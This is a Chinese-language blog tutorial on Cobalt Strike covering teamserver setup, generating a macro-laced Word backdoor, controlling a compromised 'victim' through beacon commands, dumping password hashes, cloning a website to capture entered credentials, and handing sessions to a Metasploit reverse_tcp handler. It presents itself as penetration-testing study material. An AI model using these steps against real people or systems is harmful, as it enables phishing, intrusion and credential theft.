Cobal Strike的学习与使用

Posted Goodric

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Cobal Strike的学习与使用相关的知识,希望对你有一定的参考价值。

Cobal Strike的学习与使用

Cobalt Strike 是一款基于 java 的渗透测试神器,常被业界人称为 CS(全文简称 CS)神 器。3.0 改版后作为一个独立的平台使用。分为客户端与服务端,服务端是一个,客户 端可以有多个,可被团队进行协同操作,共享攻击资源与目标信息和sessions,可模拟 APT 做模拟对抗,进行内网渗透。

——

Cobalt Strike 集成了端口转发、扫描多模式端口 Listener、Windows exe 程序生成、
Windows dll 动态链接库生成、java 程序生成、office 宏代码生成、木马捆绑、钓鱼攻击
等功能。

把下载好的cs文件夹在Linux放一份,Windows放一份。

——
——

Linux服务端设置

团队服务器最好运行在Linux,服务端关键文件 teamserver 和 cobaltstrike.jar
执行teamsever.sh文件,IP为此Linux的IP,123456为后面客户端的连接密码。
回显信息中能够看到给出的连接端口。

./teamserver.sh 192.168.1.1 123456

客户端新建连接,填写作为服务端的IP,还有设置好的密码,给出的端口,用户名随意。
想要连接上,服务端必须想上面一样开着。

——
——

Windows客户端设置

新建监听

配置

在地下可以看到设置好的监听。

———
——

尝试生成后门文件

攻击-生成后门-ms office
这里尝试生成word文件后门

点击选择刚刚创建的监听器

然后弹出这个,点击copy复制代码。

然后新建一个word文件。
点击新建宏,刚刚copy 的内容复制进去。
保存方式后缀启用宏。

点击创建之后,把刚刚copy的代码全部粘贴进去。然后保存即可。

然后另存这个文件,并选择启用宏的word模板。

——
——

受害者上线

当目标打开这个文件的时候,可以看到成功上线。

右键受害机进入beacon会话

执行 cmd 命令需要使用“shell”+执行的命令,其他命令可使用 help
ipconfig,命令 shell ipconfig

受害机屏幕截图

screenshot

执行成功后可看到截图

端口扫描

选择目标–>端口扫描
portscan [ip] 命令

会自动识别目标机所在的内网 ip 段,可选择 ARP,ICMP,none 三种方式进
行扫描,ports 中填入你要扫描的端口

扫描

——

读取用户密码

hashdump

需要administrator权限

——
——

受害机中可关闭进程停止监听。

tasklist 看进程
taskkill /F -pid 19280

——
——

克隆网站测试

设置克隆网站,端口,主机地址默认为服务端的IP,点击克隆即可。

——
设置成功

——
访问

——
然后查看web日志,就可以看到在上面网站中输入的内容了。

——
——

Cobalt Strike 与 与 msf 的联动

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.100
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit
2.在 Cobalt Strik 中执行,先添加一个监听命令,名称为:msf payload 选择:
windows/foreign/reverse_tcp 监听端口:4444

选择受害者主机,然后右击 Spawn

在 msf 下即可反弹出 meterpreter 会话。

以上是关于Cobal Strike的学习与使用的主要内容,如果未能解决你的问题,请参考以下文章

Cobalt Strike之信息收集木马钓鱼

cobalt strike使用跳板进行内网渗透

python3+Cobal Strikeshellcode免杀技术

CSRF漏洞学习

DVWA学习日记--CSRF超详细漏洞利用讲解

小白学习Cobalt Strike4.5